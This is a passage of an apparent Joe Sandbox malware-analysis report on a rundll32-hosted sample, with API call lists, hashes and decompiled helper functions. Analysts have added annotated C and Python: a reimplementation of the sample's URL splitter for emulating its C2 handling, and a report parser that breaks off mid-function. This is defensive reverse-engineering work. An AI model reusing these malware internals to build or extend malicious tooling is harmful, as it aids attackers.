                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                          • String ID:
                                          • API String ID: 58946197-0
                                          • Opcode ID: 65c5a1dd6926ec0babec3c68de17d997cb77d1f8f9d0d6ab95c9dcd3d7bb1d1f
                                          • Instruction ID: 768dd38d696bd9f237c2c95c901b31eca53845b02c1c99375548af5604f926d2
                                          • Opcode Fuzzy Hash: 65c5a1dd6926ec0babec3c68de17d997cb77d1f8f9d0d6ab95c9dcd3d7bb1d1f
                                          • Instruction Fuzzy Hash: E1F0DA75200A419FFB089B54EC89F1577A4EB85301B059865E90EC72E0CF34ACD0DA19
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • memset.NTDLL ref: 00B7028E
                                          • CloseHandle.KERNEL32(?,?,00000100,?,00000000,?,00B5B047,00000000), ref: 00B702DC
                                          • HeapFree.KERNEL32(00000000,00000000,00000000,00000094,00000000,00B71C4A,00000000,00B5B047,00B66749,00000000,00B5B047,00B630E3,00000000,00B5B047,00B6105E,00000000), ref: 00B705E7
                                          • GetLastError.KERNEL32(?,00000000,?), ref: 00B708E9
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseErrorFreeHandleHeapLastmemset
                                          • String ID:
                                          • API String ID: 2333114656-0
                                          • Opcode ID: 78f769c2e71ce3e195c75a0bda80dbadfe79029adda3bc3ea28946a30596b0ba
                                          • Instruction ID: 47f8f46f0c1b68779ffa7508a2db7f066b9135c039bc9629217e59ee0bb3a666
                                          • Opcode Fuzzy Hash: 78f769c2e71ce3e195c75a0bda80dbadfe79029adda3bc3ea28946a30596b0ba
                                          • Instruction Fuzzy Hash: 4951C531254209FEDF11BF64DC85FAE36E8EB45700F2480E3F92DA6091DAB4CD55A6A3
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00B66378: lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,00B51036,?,?,?,?), ref: 00B6639C
                                            • Part of subcall function 00B66378: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00B663AE
                                            • Part of subcall function 00B66378: wcstombs.NTDLL ref: 00B663BC
                                            • Part of subcall function 00B66378: lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,00B51036,?,?,?), ref: 00B663E0
                                            • Part of subcall function 00B66378: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 00B663F5
                                            • Part of subcall function 00B66378: mbstowcs.NTDLL ref: 00B66402
                                            • Part of subcall function 00B66378: HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,00B51036,?,?,?,?,?), ref: 00B66414
                                            • Part of subcall function 00B66378: HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,00B51036,?,?,?,?,?), ref: 00B6642E
                                          • GetLastError.KERNEL32 ref: 00B5109F
                                            • Part of subcall function 00B5582E: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00B558DC
                                            • Part of subcall function 00B5582E: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00B55900
                                            • Part of subcall function 00B5582E: HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,00B51087,?,?,?,?,?,?,?), ref: 00B5590E
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B510BB
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B510CC
                                          • SetLastError.KERNEL32(00000000), ref: 00B510CF
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Free$AllocateErrorLastlstrlen$mbstowcswcstombs
                                          • String ID:
                                          • API String ID: 3867366388-0
                                          • Opcode ID: 7b854f5706f4fa887a991e8778bd5481f6b667c8daa00ea65b1881e21f0b98a4
                                          • Instruction ID: 0a1747539c6bf1e9cd3875229f3cbf9fadd51829a80e02f014b9720e0210ab7f
                                          • Opcode Fuzzy Hash: 7b854f5706f4fa887a991e8778bd5481f6b667c8daa00ea65b1881e21f0b98a4
                                          • Instruction Fuzzy Hash: FE313836900148FFCF129FA9DC44ADEBFB5EF49321B1445A6F929A2160C7318AA5DF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00B6B4CF: lstrlen.KERNEL32(00000000,?,?,00000000,77D34620,?,00000001,00000001,?,00B663D9,?,?,?,?,?,00000000), ref: 00B6B529
                                            • Part of subcall function 00B6B4CF: lstrlen.KERNEL32(?,?,?,00000000,77D34620,?,00000001,00000001,?,00B663D9,?,?,?,?,?,00000000), ref: 00B6B547
                                            • Part of subcall function 00B6B4CF: RtlAllocateHeap.NTDLL(00000000,76D86985,?), ref: 00B6B573
                                            • Part of subcall function 00B6B4CF: memcpy.NTDLL(00000000,00000000,00000000,?,00000001,00000001,?,00B663D9,?,?,?,?,?,00000000), ref: 00B6B58A
                                            • Part of subcall function 00B6B4CF: HeapFree.KERNEL32(00000000,00000000), ref: 00B6B59D
                                            • Part of subcall function 00B6B4CF: memcpy.NTDLL(00000000,?,?,?,00000001,00000001,?,00B663D9,?,?,?,?,?,00000000), ref: 00B6B5AC
                                          • GetLastError.KERNEL32 ref: 00B6DB0C
                                            • Part of subcall function 00B5582E: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00B558DC
                                            • Part of subcall function 00B5582E: HeapFree.KERNEL32(00000000,?,00000000,?,00000000,?,00004000,00000001,00000001,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00B55900
                                            • Part of subcall function 00B5582E: HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,00B51087,?,?,?,?,?,?,?), ref: 00B5590E
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B6DB28
                                          • HeapFree.KERNEL32(00000000,?), ref: 00B6DB39
                                          • SetLastError.KERNEL32(00000000), ref: 00B6DB3C
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Heap$Free$ErrorLastlstrlenmemcpy$Allocate
                                          • String ID:
                                          • API String ID: 2451549186-0
                                          • Opcode ID: 0b7e1e9ebc23d6af9735064748bc2054be41b75c343234e568dedfe3ae5241e5
                                          • Instruction ID: c1e6581ddb4881cc459fd7f2abebec870389d9d489369b03eb82d78db7dde2d4
                                          • Opcode Fuzzy Hash: 0b7e1e9ebc23d6af9735064748bc2054be41b75c343234e568dedfe3ae5241e5
                                          • Instruction Fuzzy Hash: 48312932904108FFCF129F99DC448DEBFB5FF48321B154596FA29A2120D7758AA1DF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: memset
                                          • String ID:
                                          • API String ID: 2221118986-0
                                          • Opcode ID: 6c294741354ccab5dd149cd86a505f7637abd2f0555b35d242ae62e90405fc7a
                                          • Instruction ID: dfa7d2b58d4af5d31103d65ef0601ca0fe254611b4cdaf47c03fa690466b4686
                                          • Opcode Fuzzy Hash: 6c294741354ccab5dd149cd86a505f7637abd2f0555b35d242ae62e90405fc7a
                                          • Instruction Fuzzy Hash: CB218E72500A09FBCB269F60EC80A667BB9FF183027040599FD4586911E732E8BADBD5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 58%
                                          			// Splits a URL into two separately allocated buffers: the host and the
                                          			// path. The __imp__ calls are resolved from the API list that follows:
                                          			// lstrlen (ref 048952A2) and lstrcpy (refs 04895310, 0489531C).
                                          			// E04894DF6 is the heap allocator (RtlAllocateHeap) and E048979D7
                                          			// locates the first '/' or '?' (StrChrA). Layout and variable names are
                                          			// the decompiler's; only comments and the missing declarations were added.
                                          			E04895296(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
                                          				intOrPtr* _v8;
                                          				intOrPtr _t2;
                                          				void* _t17;
                                          				intOrPtr* _t22;
                                          				intOrPtr* _t26;
                                          				void* _t27;
                                          				intOrPtr _t28;
                                          				char* _t30;
                                          				void* _t33;
                                          				void* _t34;
                                          				void* _t36;
                                          				void* _t37;
                                          				void* _t39;
                                          				int _t42;
                                          
                                          				_t17 = __eax;
                                          				_t37 = 0;                                      // result: 0 = failure
                                          				__imp__(_a4, _t33, _t36, _t27, __ecx);         // lstrlen(_a4)
                                          				_t2 = _t17 + 1; // 0x1                          // length + terminator
                                          				_t28 = _t2;
                                          				_t34 = E04894DF6(_t2);                         // host buffer
                                          				if(_t34 != 0) {
                                          					_t30 = E04894DF6(_t28);                    // path buffer, same size
                                          					if(_t30 == 0) {
                                          						E04894C73(_t34);                       // release the host buffer (inferred; not in the API list)
                                          					} else {
                                          						_t39 = _a4;
                                          						_t22 = E048979D7(_t39);                // first '/' or '?' in the string
                                          						_v8 = _t22;
                                          						// A doubled separator ("//" after a scheme) is skipped and the
                                          						// search repeated from the character after it, so the scheme is dropped.
                                          						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
                                          							_a4 = _t39;
                                          						} else {
                                          							_t26 = _t22 + 2;
                                          							_a4 = _t22 + 2;
                                          							_t22 = E048979D7(_t26);
                                          							_v8 = _t22;
                                          						}
                                          						if(_t22 == 0) {
                                          							__imp__(_t34, _a4);                // lstrcpy(host, _a4): no path component
                                          							 *_t30 = 0x2f;                     // path defaults to "/"
                                          							 *((char*)(_t30 + 1)) = 0;
                                          						} else {
                                          							_t42 = _t22 - _a4;                 // host length: bytes before the separator
                                          							memcpy(_t34, _a4, _t42);
                                          							 *((char*)(_t34 + _t42)) = 0;
                                          							__imp__(_t30, _v8);                // lstrcpy(path, separator): keeps the leading '/' or '?'
                                          						}
                                          						 *_a8 = _t34;                          // out: host
                                          						_t37 = 1;
                                          						 *_a12 = _t30;                         // out: path
                                          					}
                                          				}
                                          				return _t37;
                                          			}

                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000008,?,76D84D40,?,?,04894BF5,?,?,?,?,00000102,04895388,?,?,00000000), ref: 048952A2
                                            • Part of subcall function 04894DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04895522), ref: 04894E02
                                            • Part of subcall function 048979D7: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,048952D0,00000000,00000001,00000001,?,?,04894BF5,?,?,?,?,00000102), ref: 048979E5
                                            • Part of subcall function 048979D7: StrChrA.SHLWAPI(?,0000003F,?,?,04894BF5,?,?,?,?,00000102,04895388,?,?,00000000,00000000), ref: 048979EF
                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04894BF5,?,?,?,?,00000102,04895388,?), ref: 04895300
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04895310
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0489531C
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                          • String ID:
                                          • API String ID: 3767559652-0
                                          • Opcode ID: f4c1f75583e6bc163fb51e9991895c5dd56cc8da929bf35c5def550f5bf0a237
                                          • Instruction ID: 81fd9f36bdbabcbe6da8bcda8f18a013442ab7c9e19abb4692103367544c7495
                                          • Opcode Fuzzy Hash: f4c1f75583e6bc163fb51e9991895c5dd56cc8da929bf35c5def550f5bf0a237
                                          • Instruction Fuzzy Hash: 0721C372504A59BFCF126FB8C844A9E7FE9EF16244B4C4A54F805DB201D674ED01D7A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%
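E04895296 above carves a URL into two separately allocated buffers, host and path, and drops the scheme when it meets a doubled separator such as the "//" in "http://". The following is an added C reimplementation for analysts who want to reproduce that parsing outside the sample (for instance when emulating its C2 string handling); it is not code from the sample or from Joe Sandbox. It assumes that subcall 048979D7, which calls StrChrA for '/' and then '?', returns the earlier of the two matches; the names split_url, find_sep and split_matches and the example URLs are my own, not strings taken from the report.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* First '/' or '?' in s, whichever comes first; NULL if neither occurs.
   This is the assumed behaviour of subcall 048979D7 (two StrChrA calls). */
static const char *find_sep(const char *s) {
    const char *slash = strchr(s, '/');
    const char *qmark = strchr(s, '?');
    if (slash == NULL) return qmark;
    if (qmark == NULL) return slash;
    return slash < qmark ? slash : qmark;
}

/* Readable equivalent of E04895296: split url into a heap-allocated host
   and path. Returns 1 and sets *host/*path on success (caller frees both),
   0 if allocation fails. Both buffers are strlen(url)+1 bytes, as in the
   sample, so every copy below fits. */
int split_url(const char *url, char **host, char **path) {
    size_t cap = strlen(url) + 1;
    char *h = malloc(cap);
    if (h == NULL) return 0;
    char *p = malloc(cap);
    if (p == NULL) { free(h); return 0; }

    const char *start = url;
    const char *sep = find_sep(start);
    /* A doubled separator ("//" as in "http://") is treated as the scheme
       delimiter: everything before it is dropped and the search repeats. */
    if (sep != NULL && sep[0] == sep[1]) {
        start = sep + 2;
        sep = find_sep(start);
    }
    if (sep == NULL) {
        strcpy(h, start);        /* whole remainder is the host */
        p[0] = '/';              /* path defaults to "/" */
        p[1] = '\0';
    } else {
        size_t n = (size_t)(sep - start);
        memcpy(h, start, n);     /* host = bytes before the separator */
        h[n] = '\0';
        strcpy(p, sep);          /* path keeps its leading '/' or '?' */
    }
    *host = h;
    *path = p;
    return 1;
}

/* Test helper: 1 if split_url(url) yields exactly (want_host, want_path). */
int split_matches(const char *url, const char *want_host, const char *want_path) {
    char *h, *p;
    if (!split_url(url, &h, &p)) return 0;
    int ok = strcmp(h, want_host) == 0 && strcmp(p, want_path) == 0;
    free(h);
    free(p);
    return ok;
}

int main(void) {
    /* Constructed inputs; none are indicators from the sample. */
    const char *samples[] = {
        "http://example.test/gate.php?id=1",
        "example.test",
        "example.test?id=1",
        "https://example.test",
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        char *h, *p;
        if (split_url(samples[i], &h, &p)) {
            printf("%-36s host=%-14s path=%s\n", samples[i], h, p);
            free(h);
            free(p);
        }
    }
    return 0;
}
```

Note that a bare "host?id=1" keeps the '?' in the path, and an input with no separator at all still yields a path of "/", exactly as the two branches after the second E048979D7 call do in the listing.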

                                          APIs
                                          • lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,00B6C0A9,00000000,00000000,00000004,00000000,?,00B6A6B6,?,?,00000000), ref: 00B5F12F
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                            • Part of subcall function 00B727EB: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00B5F15D,00000000,00000001,00000001,?,?,00B6C0A9,00000000,00000000,00000004,00000000), ref: 00B727F9
                                            • Part of subcall function 00B727EB: StrChrA.SHLWAPI(?,0000003F,?,?,00B6C0A9,00000000,00000000,00000004,00000000,?,00B6A6B6,?,?,00000000,00B5D3E9,?), ref: 00B72803
                                          • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00B6C0A9,00000000,00000000,00000004,00000000,?,00B6A6B6,?), ref: 00B5F18D
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00B5F19D
                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00B5F1A9
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                          • String ID:
                                          • API String ID: 3767559652-0
                                          • Opcode ID: 461a77c73d52faf25b25c4a67fc66f6423b2768440cf16b908db456a0af1cacc
                                          • Instruction ID: dc300fb8f1b7f9fe489802ae9e2369629bebc1544569a4a3b4223dc3aef11b32
                                          • Opcode Fuzzy Hash: 461a77c73d52faf25b25c4a67fc66f6423b2768440cf16b908db456a0af1cacc
                                          • Instruction Fuzzy Hash: 32219072504616EBCB126F68CC84AAABFECDF06381B0580E5FD09AB212DB35D94497A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: memset
                                          • String ID:
                                          • API String ID: 2221118986-0
                                          • Opcode ID: 280e02b369eb955c104324183c048bd4a622080a89de0441f21e1e2b9aab48cb
                                          • Instruction ID: f5be54fa70843a2077d3f2bee3be598be46012608e27ecb8733187f33608fad0
                                          • Opcode Fuzzy Hash: 280e02b369eb955c104324183c048bd4a622080a89de0441f21e1e2b9aab48cb
                                          • Instruction Fuzzy Hash: C7119172500509BBCB20AFA0DC81A6677B8FF09310B080598FA4469851EB76F9B2DFD2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			// Concatenates two wide strings into a freshly allocated buffer.
                                          			// Sizes are in bytes: (len1 + len2) * 2 + 2 covers both strings plus
                                          			// one wide terminator. E04894DF6 is the heap allocator (RtlAllocateHeap).
                                          			// Only comments and the missing _t10 declaration were added.
                                          			E04896203(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                                          				void* _v8;
                                          				int _t10;
                                          				void* _t18;
                                          				int _t25;
                                          				int _t29;
                                          				int _t34;
                                          
                                          				_t29 = lstrlenW(_a4);                                  // characters in the first string
                                          				_t25 = lstrlenW(_a8);                                  // characters in the second string
                                          				_t18 = E04894DF6(_t25 + _t29 + _t25 + _t29 + 2);       // 2 * (len1 + len2) + 2 bytes
                                          				_v8 = _t18;
                                          				if(_t18 != 0) {
                                          					_t34 = _t29 + _t29;                                // first string: len1 * 2 bytes, no terminator
                                          					memcpy(_t18, _a4, _t34);
                                          					_t10 = _t25 + 2; // 0x2
                                          					memcpy(_v8 + _t34, _a8, _t25 + _t10);             // second string: (len2 + 1) * 2 bytes, with terminator
                                          				}
                                          				return _v8;                                            // NULL if allocation failed
                                          			}

                                          APIs
                                          • lstrlenW.KERNEL32(004F0053,?,76D85520,00000008,052493CC,?,04896861,004F0053,052493CC,?,?,?,?,?,?,04896BB4), ref: 04896213
                                          • lstrlenW.KERNEL32(04896861,?,04896861,004F0053,052493CC,?,?,?,?,?,?,04896BB4), ref: 0489621A
                                            • Part of subcall function 04894DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04895522), ref: 04894E02
                                          • memcpy.NTDLL(00000000,004F0053,76D869A0,?,?,04896861,004F0053,052493CC,?,?,?,?,?,?,04896BB4), ref: 0489623A
                                          • memcpy.NTDLL(76D869A0,04896861,00000002,00000000,004F0053,76D869A0,?,?,04896861,004F0053,052493CC), ref: 0489624D
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlenmemcpy$AllocateHeap
                                          • String ID:
                                          • API String ID: 2411391700-0
                                          • Opcode ID: d89360c93a86468641784a4565eee9f5cc4eb20022480a03910fa4439600991a
                                          • Instruction ID: 2fe099601debc5676fab0a512855c0a995b89f21e5bdbe6a19098f5d92936dd5
                                          • Opcode Fuzzy Hash: d89360c93a86468641784a4565eee9f5cc4eb20022480a03910fa4439600991a
                                          • Instruction Fuzzy Hash: B4F03776900518BB8F11EFE8CC89C8E7BACEF492587094562E904E7201EA71EE118BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlen.KERNEL32(69B25F44,?,?,00000000,00B6385A,00000000,00000000,?,00000000,69B25F44,?,?,?,?,?,69B25F44), ref: 00B65361
                                          • lstrlen.KERNEL32(?,?,?,?), ref: 00B65366
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • memcpy.NTDLL(00000000,?,00000000,?,?,?,?), ref: 00B65382
                                          • lstrcpy.KERNEL32(00000000,?), ref: 00B653A0
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrlen$AllocateHeaplstrcpymemcpy
                                          • String ID:
                                          • API String ID: 1697500751-0
                                          • Opcode ID: 5588e7fc4d9824ab44947a4004dd5951574ad1499d652cb648bc20e9270310a1
                                          • Instruction ID: 1f25f40449540db38f903c48d53f228aeb11c69939d4f6e64aba9581d1028256
                                          • Opcode Fuzzy Hash: 5588e7fc4d9824ab44947a4004dd5951574ad1499d652cb648bc20e9270310a1
                                          • Instruction Fuzzy Hash: 90F0F6B7404B41ABD73157AD9C48E1BBBDCEFC4751F090495FA4A87201E739D8148BB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlen.KERNEL32(05249B90,00000000,00000000,7477C740,04896568,00000000), ref: 04893980
                                          • lstrlen.KERNEL32(?), ref: 04893988
                                            • Part of subcall function 04894DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04895522), ref: 04894E02
                                          • lstrcpy.KERNEL32(00000000,05249B90), ref: 0489399C
                                          • lstrcat.KERNEL32(00000000,?), ref: 048939A7
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.712038836.0000000004891000.00000020.10000000.00040000.00000000.sdmp, Offset: 04890000, based on PE: true
                                          • Associated: 00000002.00000002.712023779.0000000004890000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712055656.0000000004899000.00000002.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712068436.000000000489A000.00000004.10000000.00040000.00000000.sdmp
                                          • Associated: 00000002.00000002.712106423.000000000489C000.00000002.10000000.00040000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_4890000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                          • String ID:
                                          • API String ID: 74227042-0
                                          • Opcode ID: ae422d91da4bae722a44135b089e629bd0303e02b62d295558c6391fa323aed3
                                          • Instruction ID: 917173ac3ae9379652f2c9c9870d82f9dc2f25b61cf16dc84cb9f6e10429e4cc
                                          • Opcode Fuzzy Hash: ae422d91da4bae722a44135b089e629bd0303e02b62d295558c6391fa323aed3
                                          • Instruction Fuzzy Hash: 8FE09B735019207B4B116BA89C48C5FB7ACEF8965170C0D1AFA00D3200CB299C01CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • lstrlen.KERNEL32(06148560,00000000,00000000,76DC81D0,00B5ACFB,00000000), ref: 00B6E641
                                          • lstrlen.KERNEL32(?), ref: 00B6E649
                                            • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
                                          • lstrcpy.KERNEL32(00000000,06148560), ref: 00B6E65D
                                          • lstrcat.KERNEL32(00000000,?), ref: 00B6E668
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.710361682.0000000000B50000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_b50000_rundll32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                          • String ID:
                                          • API String ID: 74227042-0
                                          • Opcode ID: 38e0972d80a4d5ca330b5220e6d6a57cc4ba1435048bcd105feb25f693b95ac2
                                          • Instruction ID: daef6660bbd7a1c752aea7548f7ee90c43d99e40ca03f7cb1f65433a9ec760e1
                                          • Opcode Fuzzy Hash: 38e0972d80a4d5ca330b5220e6d6a57cc4ba1435048bcd105feb25f693b95ac2
                                          • Instruction Fuzzy Hash: 88E09233501220A78A115BE8AC48C5FBBACEF897123050416F705D3110CB25D8008BA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%
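
                                          The three rundll32 blocks above share one call shape: two lstrlen calls, RtlAllocateHeap reached through a subcall, then lstrcpy followed by lstrcat or memcpy. The report gives the second and third the same API String ID (74227042) and lists RtlAllocateHeap as "AllocateHeap" in its API ID. The Python below is an added example, not part of the Joe Sandbox report and not code from the sample: it parses the report's "APIs" lines, mirrors that Rtl-prefix normalisation, clusters blocks with identical API profiles, and applies a heuristic of my own for the "join two strings into a fresh heap buffer" shape. The sample blocks are transcribed from the entries above; the "/a" and "/b" suffixes on the repeated ID are mine, and no attempt is made to reproduce the report's own ID hashing.

```python
"""Parse Joe Sandbox 'APIs' call lists and cluster function blocks by API profile."""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Constructed sample: the three rundll32 function blocks from the report, keyed by
# the report's "API String ID" (the suffixes /a and /b are added here because the
# second and third blocks carry the same ID).
SAMPLE_BLOCKS: Dict[str, str] = {
    "1697500751": """
• lstrlen.KERNEL32(69B25F44,?,?,00000000,00B6385A,00000000,00000000,?,00000000,69B25F44,?,?,?,?,?,69B25F44), ref: 00B65361
• lstrlen.KERNEL32(?,?,?,?), ref: 00B65366
  • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
• memcpy.NTDLL(00000000,?,00000000,?,?,?,?), ref: 00B65382
• lstrcpy.KERNEL32(00000000,?), ref: 00B653A0
""",
    "74227042/a": """
• lstrlen.KERNEL32(05249B90,00000000,00000000,7477C740,04896568,00000000), ref: 04893980
• lstrlen.KERNEL32(?), ref: 04893988
  • Part of subcall function 04894DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04895522), ref: 04894E02
• lstrcpy.KERNEL32(00000000,05249B90), ref: 0489399C
• lstrcat.KERNEL32(00000000,?), ref: 048939A7
""",
    "74227042/b": """
• lstrlen.KERNEL32(06148560,00000000,00000000,76DC81D0,00B5ACFB,00000000), ref: 00B6E641
• lstrlen.KERNEL32(?), ref: 00B6E649
  • Part of subcall function 00B61C01: RtlAllocateHeap.NTDLL(00000000,00000001,00B71A23), ref: 00B61C0D
• lstrcpy.KERNEL32(00000000,06148560), ref: 00B6E65D
• lstrcat.KERNEL32(00000000,?), ref: 00B6E668
""",
}

# One "APIs" line: optional subcall prefix, api.MODULE(args), ref: hex address.
CALL_RE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function (?P<callee>[0-9A-F]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: Tuple[str, ...]
    ref: int        # address of the call site, parsed from the "ref:" field
    callee: str     # subcall function address, or "" when the call is in the block itself


def parse_calls(block: str) -> List[ApiCall]:
    """Extract every call line from one block's 'APIs' section, including subcall lines."""
    calls: List[ApiCall] = []
    for line in block.splitlines():
        m = CALL_RE.match(line)
        if not m:
            continue
        args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
        calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16), m["callee"] or ""))
    return calls


def normalize_api(name: str) -> str:
    # The report's own API ID spells RtlAllocateHeap as AllocateHeap; mirror that so
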